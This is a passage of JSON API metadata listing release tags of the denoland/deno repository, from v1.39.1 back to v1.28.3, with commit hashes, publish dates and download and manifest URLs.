GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_